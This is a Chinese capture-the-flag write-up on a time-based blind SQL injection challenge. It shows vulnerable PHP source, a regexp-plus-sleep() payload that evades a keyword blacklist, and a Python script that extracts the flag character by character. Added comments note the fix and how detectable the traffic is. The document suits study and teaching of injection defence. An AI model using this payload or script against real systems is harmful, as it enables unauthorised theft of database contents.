GYCTF 盲注【regexp注入+时间盲注】

考点:regexp注入+时间盲注

源码:

<?php
    # The flag is stored in fl4g (original comment: "flag在fl4g里").
    # check_sql() and the mysql wrapper class come from waf.php, which is
    # not shown on this page, so the exact filter rules cannot be read here.
    include 'waf.php';
    header("Content-type: text/html; charset=utf-8"); 
    $db = new mysql();

    # Untrusted input: taken straight from the query string, no cast or type check.
    $id = $_GET['id'];

    if ($id) {
        # Blacklist-style filter: per the writeup, union / select / ' / = are
        # rejected while sleep() passes.  A keyword blacklist is not a fix for
        # the query below; a prepared statement or an (int) cast on $id would be.
        if(check_sql($id)){
            exit();
        } else {
            # Injection point: $id is interpolated unquoted into the statement,
            # so anything that survives check_sql() is executed as SQL.
            $sql = "select * from flllllllag where id=$id";
            $db->query($sql);
        }
    }
    highlight_file(__FILE__);

`union`、`select`、`'`、`=` 都被 ban 了，但 `sleep()` 没有被 ban

考虑用 regexp 代替 = 进行时间盲注

?id=1 or if((length(database()) regexp 5), sleep(5), 1)

exp:
#脚本来源https://www.gem-love.com/ctf/1669.html#i-2
import requests
import time
import datetime  # NOTE(review): imported but never used in this script
from urllib.parse import quote

# Challenge instance; the injection lands in the `id` GET parameter.
url = "http://2c2d306b5d6745be846972da7fd262b6e3668d53fa124de3.changame.ichunqiu.com/?id=111"
# Candidate characters tried, in this order, at every position.
alphabet = ['?','!',',','|','[',']','{','}','_','/','*','-','+','&',"%",'#','@','$','~','a','b','c','d','e','f','j','h','i','g','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','G','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9']
# Expression whose characters are extracted one at a time (the flag column).
target = 'fl4g'
result = ''
print('www.gem-love.com')
# Time-based blind extraction: for positions 1..32, try each candidate; the
# server sleeps 3 s when substr(target, i, 1) matches the candidate.  regexp
# stands in for the blacklisted `=`.
# From a defender's view this traffic is loud: up to len(alphabet) requests
# per character, each carrying `sleep(` / `regexp` in `id`, with ~3 s
# responses on hits -- easy to alert on in WAF or access logs.
for i in range(1, 33):
    for char in alphabet:
        # build the payload; it is URL-encoded and appended to `url`
        payload =' or if((substr(({}),{},1) regexp "^{}"),sleep(3),1)'.format(target, i, char)
        # measure the round-trip time in whole seconds
        start = int(time.time())
        r = requests.get(url+quote(payload))
        response_time = int(time.time()) - start
        # threshold is 2 s rather than 3 -- presumably to absorb the
        # whole-second truncation of start/end; verify against the server
        if response_time >= 2:
            result += char
            print('Found: {}'.format(result))
            break



转载自www.cnblogs.com/tiaopidejun/p/12367774.html